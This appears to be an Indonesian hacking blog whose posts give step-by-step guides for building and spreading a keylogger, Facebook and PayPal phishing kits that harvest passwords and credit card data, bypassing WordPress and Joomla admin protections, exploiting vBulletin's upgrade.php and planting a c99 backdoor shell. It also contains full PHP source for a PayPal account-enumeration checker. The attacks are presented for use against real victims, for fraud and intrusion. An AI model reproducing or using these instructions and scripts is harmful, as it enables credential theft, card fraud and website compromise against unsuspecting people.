Trojanz
Boy
today : | at : | safemode : ON
> / Home / Facebook / Twitter /
name author perms com modified label

Merekam aktifitas ketikkan keyboard dengan keylogger SYSLOGGER TrojanzBoy rwxr-xr-x 4 01.50

Filename Merekam aktifitas ketikkan keyboard dengan keylogger SYSLOGGER
Permission rw-r--r--
Author TrojanzBoy
Date and Time 01.50
Label
Action


Keylogger adalah aplikasi yang bisa merekam aktifitas pengguna komputer. Berasal dari kata kerja “log”. Orang/program yang melakukan aktifitas log ini namanya “logger”. Sedangkan “logging” berarti adalah istilah untuk kegiatan “merekam” aktifitas log-nya. Yaaah…. bahasa inggris gitu deh. Hehehe..
Banyak metode untuk merekam aktifitas pengguna komputer… Ada yang berdasarkan key stroke (rekaman langsung semua kata yang dipencet di keyboard), ada yang memantau clipboard Windows (yang pake Windows nih..), ada juga keylogger yang secara terang-terangan memiliki interface yang cantik, padahal ternyata menipu. Dan mungkin masih banyak lagi cara-cara “logging” aktifitas pengguna dengan memanfaatkan keylogger. Langsung ke praktek yuyayu..?!
Sebelumnya, ada alasan mengapa saya menulis tentang keylogger ini. Saya mengutip pembicaraan seorang ahli keamanan komputer yang menjelaskan kurang lebih begini:
“Keylogger adalah aplikasi yang bisa merekam password yang di ketik oleh pengguna”.
Pernyataan ini sedikit menggelitik bagi saya. Ya, padahal itu adalah salah satu penerapan dari keylogger! Tapi bukan itu saja yang bisa dilakukan keylogger

di sini saya menggunakan software syslogger
software nya bisa di download di --> https://www.dropbox.com/s/4ly2je0ivus749m/Syslogger.zip

keylogger ini sangat ringan dan stabil

ok langsung aja settinganya

disini kelebihan syslogger terdapat 2 metode pengiriman log yang pertama menggunakan email dan yang kedua menggunakan ftp . tapi kali ini saya akan menggunakan email saja

setting email kalian dan password email nya
disini saya menggunakan gmail
 
setelah di setting klik test apabila berhasil email tsb bisa digunakan



 nb: kalau gmail kalian menggunakan authentication mobile maka gagal alias log tidak bisa di kirim ke email kalian

setelah itu settingan log nya atur waktu dan efek nya disini saya akan mengatur waktu tiap 15 menit log akan terkirim ke email saya




kalian juga bisa menambahkan efek properties buat ketergan manipulasi nya seperti ganti icon dan assemblynya

setelah itu klik build server untuk hasil terkahirnya lalu simpan dengan nama terserah anda disini saya kasih nama install.exe


nah sekarang file tersebut bisa di sebarkan ke teman atau di internet tentunya dengan manipulasi se kreatif kalian . Bisa lewat forum,download,facebook,dll



hasil dari lognya



 software ini juga di lengkapi obat penawar nya loh
barangkali hasil keyloggernya di coba di pc sendiri



Hack facebook dengan tehnik login porn video TrojanzBoy rwxr-xr-x 4 22.06

Filename Hack facebook dengan tehnik login porn video
Permission rw-r--r--
Author TrojanzBoy
Date and Time 22.06
Label
Action

kali ini saya akan menunjukkan cara hack fb dengan teknik lain

yaitu membuat fake login dengan menyangkutkan halaman porno,karna kebanyakan pria suka porno

ok langsung aja yaa

pertama donload dulu fake loginya

https://www.dropbox.com/s/abjec1waoem0fxt/porn.fb.zip

setelah itu upload di hosting kalian bisa dari hasil curian disini saya menggunakan hosting curian

setelah di upload lalu unzip









setelah selesai ekstrak saatnya menyebarkan halaman fake login kita ke jejaring sosial fb


dan tampilan loginya


halaman ketika sudah login



dan ketika si korban masuk maka user n passwordnya terekam di trojanzboy.txt


hapy hacking

Mengatasi halaman wp-admin yang di sembunyikan atau di redirect halaman depan TrojanzBoy rwxr-xr-x 1 08.59

Filename Mengatasi halaman wp-admin yang di sembunyikan atau di redirect halaman depan
Permission rw-r--r--
Author TrojanzBoy
Date and Time 08.59
Label
Action
Hmm . . .kali ini saya akan memberikan trick untuk mengetahui halaman wp-admin wordpress yang biasanya disembunyikan dan di redirect ke halaman depan

jangan nyerah dulu

kadang kala kita menemui kasus ini ketika kita melakukan deface dengan teknik symlink kadang kala menemukan config wordpress dan halaman adminya tidak bisa di akses atau di alihkan ke halaman depan

langsung aja buka mysql interface untuk mengakses config wordpress

lalu pergi ke table wp-option dan cari  "active_plugins"

setelahitu hapus data active plugins


 lalu coba balik ke wp-admin website korban lalu coba kita akses



taraaaaa . . .  halaman wp-admin pun muncul ini artinya akses ke halaman login wordpress pun bisa di akses

happy hacking

Mengatasi halaman administrator joomla yang disembunyikan TrojanzBoy rwxr-xr-x 1 16.33

Filename Mengatasi halaman administrator joomla yang disembunyikan
Permission rw-r--r--
Author TrojanzBoy
Date and Time 16.33
Label
Action
Hmm . . .kali ini saya akan memberikan trick untuk mengetahui halaman administrator joomla yang biasanya disembunyikan dan di redirect ke halaman depan

jangan nyerah dulu

kadang kala kita menemui kasus ini ketika kita melakukan deface dengan teknik symlink kadang kala menemukan config joomla dan halaman adminya tidak bisa di akses atau di alihkan ke halaman depan

langsung aja buka mysql interface untuk mengakses config joomla

cari data extension lalu masuk ke data dan cari data content_loadmodule lalu hapus




dan masuk halaman administratornya



ATAU ada cara lain

lalu pilih plugins atau module



setelah itu cari jsecure authentication lalu klik edit


setelah klik edit cari key nya disini key tersebut adalah kikams



nah kita udah dapat kuncinya

saatny masuk di website korban untuk memasukkan kunci administratornya



http://websitekorban/administrator?kikams

dan sukses kita bisa akses halaman admin joomla

Hack vbulletin forum dengan upgrade exploit + upload shell backdoor TrojanzBoy rwxr-xr-x 1 21.56

Filename Hack vbulletin forum dengan upgrade exploit + upload shell backdoor
Permission rw-r--r--
Author TrojanzBoy
Date and Time 21.56
Label
Action




Tutor kali ini akan mempraktekkan bagaimana cara exploit website yang beraliran cms vbulletin


ok langsung saja ya

kita butuhkan dork terlebih dahulu

Inurl://install/upgrade.php
intext:vBulletin 4.2.1 Upgrade System
intext:vbulletin-style.xml

copy salah satu dork tersebut lalu tulis di google untuk mencari web site yang rentan akan exploit nya

 setelah itu buka web nya 

lalu masukkan exploitnya 
/install/upgrade.php


misalnya : http://websitetarget.com/install/upgrade.php




kemudian ctrl + U halamanya 
dan anda akan di baa ke halaman source code halaman

dan cari  CUSTNUMBER



setelah mengcopy custnumbernya sekarang download script nya

https://dl.dropboxusercontent.com/s/rmk6y85fr7g11vo/0dayVbulletin-upgrade.php?token_hash=AAGnO5qdtsLUZtvgE87xJo10mNIXjA4gZQbbQBfwTD4w9g&dl=1


setelah download upload script tersebut ke hosting anda

atau bisa gunakan punya saya

http://partisikantor-sms.com/clearbox/language/en/0dayVbulletin-upgrade.php
 setelah itu
copy url korban ,
customer id isi dengan custnumber yang telah di copy tadi ,
username & password & email terserah anda

Lalu kita INJECT


dan sukses



jika berhasil kembali ke website korban dan login ke halaman admin panel nya
http://websitekorban.com/adminpanel

 lalu login dengan username & password yang telah dibuat tadi





dan berhasil sekarang tujuan kita disin adalah memasukkan backdoor php buat hack web tersebut

dowload backdoor php di --> https://dl.dropboxusercontent.com/s/iyde0pvi7jgyvih/kodok.php?token_hash=AAFqn-9NRtKhS7Thz_q1QogdJLF6dKcTpducDgr-gCiX1g&dl=1




done . . 

Next, tambahkan url di depan /admincp ditambah /plugin.php?do=files
http://webstarget/admincp/plugin.php?do=files


 Maka anda akan dibawa ke tempat upload shell


sekarang download backdoor shell yang berextensi .xml

download shell --> https://dl.dropboxusercontent.com/s/a3ub3oj8at75zxb/c99.xml.rar?token_hash=AAGfbp-U3BPYVEMzudsOOOpHW4a5eijwfV6yblNpnv6v9w&dl=1

lalu upload/import

Kalo upload nya dah selesai, cek di
http://webtarget.com/admincp/subscriptions.php

dan backdoor pun sudah tertanam pada web


tinggal sekarang terserah mau di deface atau yang lainya

Paypal Valid checker srcipt TrojanzBoy rwxr-xr-x 2 20.52

Filename Paypal Valid checker srcipt
Permission rw-r--r--
Author TrojanzBoy
Date and Time 20.52
Label
Action


langsung aja mau share script buat check email apakan email tersebut akun paypa apa bukan

langsung aja ni source codenya


<?php
@set_time_limit(0);

function curl($url='',$var='',$Follow=False){
    global $set;
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
    curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt');
    curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt');
    curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt');
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    if ($Follow !== False) {
    curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
    }
    $result = curl_exec($curl);
    curl_close($curl);
    return $result;
}
echo "<head>
<style type='text/css'>body{background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaAE5HWuvKE_1WdMAOaS8Mmpjl3t81xOrOQdxlQYUP5rkQTgZXy0P9zOc94GWZv-tyLbSGVgqQirI-AH0LQolxfhxeLHXppJUX4Z96895_s2Nt8nL4qdY6J_0Md9ApqJrDPGbDbLLFKPUF/s1600/hacker-creates-worldwide-map-of-vulnerable-devices.png)</style>

</style>
<title>Valid Email Checker</title>
</head><div align=\"center\"></center>";

$emails = $_POST['emails'];
print '<div id="form-container"> <form method="POST">

<p align="center"><font face="Times New Roman" size="6" color="ffffff">
TrojanzBoy<br>Paypal Checker</font></p>

    <p><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
    <p><input class="submit-button" type="submit" value="Submit" name="B1"></p>
</form> </div>';
if (!empty($emails)) {
$emails = explode("\r\n", $emails);
$yes = 0;
$not = 0;
$inv = 0;
$count = 1;
print "<p align=\"left\"><font color=\"#ffffff\">Checking  <b>".count($emails)."</b> emails ....</font><br></p><p align=\"left\">";
foreach ( $emails as $email ) {
    $email = trim($email);
     print "<font color=\"#ffffff\"> $count .. Checking <b>".$email." ..... </font> </b>";
    $count++;
    if(filter_var($email, FILTER_VALIDATE_EMAIL)){
$_CheckAction = curl('https://www.paypal.com/cgi-bin/webscr?cmd=_send-money&myAllTextSubmitID=&cmd=_send-money&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40s.com&currency=USD&amount=10&amount_ccode=USD&submit.x=Continue',CURLOPT_FAILONERROR,TRUE);
            if(!strpos($_CheckAction, "region")) {
                print "<font size=\"3\" color=\"#006600\">Yes</font> <br>";
                $yes++;
                $vaild_yes .=$email."\n";
            }
        else {
            print "<font color=\"#FF0000\">NO</font><br>";
            $not++;
            $vaild_no .=$email."\n";
        }
    }
    else {
        print "<font color=\"#FF0000\">Invaild email</font><br>";
        $inv++;
        $invaild .=$email."\n";
}
}

print '<p><table border="0" width="100%">
   



         <tr>
        <td><p align="center"><font face="Times New Roman" size="4"><font color="#006600">PayPal emails</font> <b>(<font color="#006600"><b>'.$yes.'</b></font>)</b> </p></td>
        <td><p align="center"><font face="Times New Roman" size="4"><font color="#FF0000">Not PayPal emails</font> <b>(<font color="#FF0000">'.$not.'</font>)</b> </p> </td>
        <td><p align="center"><font face="Times New Roman" size="4"><font color="#FF0000">Invalid emails</font> <b>(<font color="#FF0000">'.$inv.'</font>)</b> </p> </td>
</tr>

    <tr>

   
   
   
          <td><div id="form-container1"><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></div></td>
        <td><div id="form-container1"><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></div></td>
        <td><div id="form-container1"><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></div></td>
    </tr>
</table></p>';
}

?><p>&nbsp;</p>
     


buka dengan txt dan simpan dengan extensi .php


thanks

Hack paypal dengan fitur baru TrojanzBoy rwxr-xr-x 29 19.48

Filename Hack paypal dengan fitur baru
Permission rw-r--r--
Author TrojanzBoy
Date and Time 19.48
Label
Action
Jika kita sering berkelana di dunia maya alias internet pasti setidaknya pernah melihat logo gambar di atas, yup itu adalah logo PayPal. Mungkin beberapa dari kita pernah terbesit pikiran apa itu paypal? Jika ditelusur di situs resminya yaitu PayPal.com, PayPal adalah cara yang lebih aman dan lebih mudah untuk membayar dan dibayar secara online. Layanan ini memungkinkan setiap orang untuk membayar dengan cara sesuai kehendak kita, termasuk melalui kartu kredit, rekening bank, kredit pembeli atau saldo rekening, tanpa memberitahukan informasi keuangan kita.
Apabila diibaratkan, rekening PayPal itu mirip dengan rekening bank online, tapi rekening bank online terbatas hanya berlaku di satu negara. Contoh simple’nya, kita tidak bisa membeli barang/jasa di situs luar negeri seperti eBay.com, godaddy.com, amazon.com dan lain-lain. Dan juga apabila kamu pengguna BlackBerry ataupun iPhone/iPad, kamu tidak bisa membeli aplikasi dan game pada App Wolrd ataupun App Store dengan rekening Bank, namun jika kamu memiliki akun PayPal maka kamu bisa membeli aplikasi tersebut.
Pada intinya jika kamu suka berbelanja online, PayPal akan memudahkan kamu dalam hal pembayaran, karena saat ini sudah ada jutaan pedagang/toko online di seluruh dunia yang menerima pembayaran online dengan PayPal. Apalagi jika kamu pedagang/toko online, sudah wajib hukumnya membuat akun PayPal untuk mempermudah orang dari negara lain melakukan pembayaran.

ok langsung aja

pertama download script login paypal + full fitur dan info di -->https://dl.dropboxusercontent.com/s/hjlapnolhvyuxi8/paypal.zip?token_hash=AAHgew8nchp3_soGoxdSCmvZe4Jv_evQDKTjRqNQE01f1Q&dl=1
fitur yang dimiliki script ini kita akan mendapatkan info CC , CVV  dan email korban

Email address : xxxxxxxxxxx@domain.com
PayPal Password : xxxxxxxxxxx
Card Type : Visa
Card Number :
Expiration Date :
Card Verification Number :
Password o SecureCode :
-------------------------------------
first name :
last name :
Address 1 :
DOB :
Date :
City :
State :
ZIP Code :
Telephone :
-------------------------------------

dan upload script login paypal ke hosting anda

lalu unzip script yang di download tadi



buka file TrojanzBoy.php dan rubah email nya menjadi email kalian







dan buka file process.php rubah email menjadi email kalian



 lalu

sekarang download dulu script email nya -->  https://dl.dropboxusercontent.com/s/xj7dhewsrt2vgiv/massmail.php?token_hash=AAG8N4JXllWcbWVMsXjGeE1gg-4Q4bU4Oib0foMbh94ExA&dl=1

setelah itu upload ke hosting kalian

lalu buka scriptnya


lalu buat email yang sekiranya korban bisa percaya bahwa email tersebut beneran dari paypal




 setelah itu kirim email dan korban pun membuka email

dan isinya email yang seolah - olah dari paypal



dan jika korban membuka isinya maka akan dialihkan ke link login paypal palsu

tampilan awal loginya




setelah sukses login



dan halamin security measures pun juga ada beserta info credit cardnya



dan hasil loging  akan terkirim ke email kita



dan credit card pun siap untuk kita gunakan belanja
Langganan: Postingan (Atom)
 

2013 ./TrojanzBoy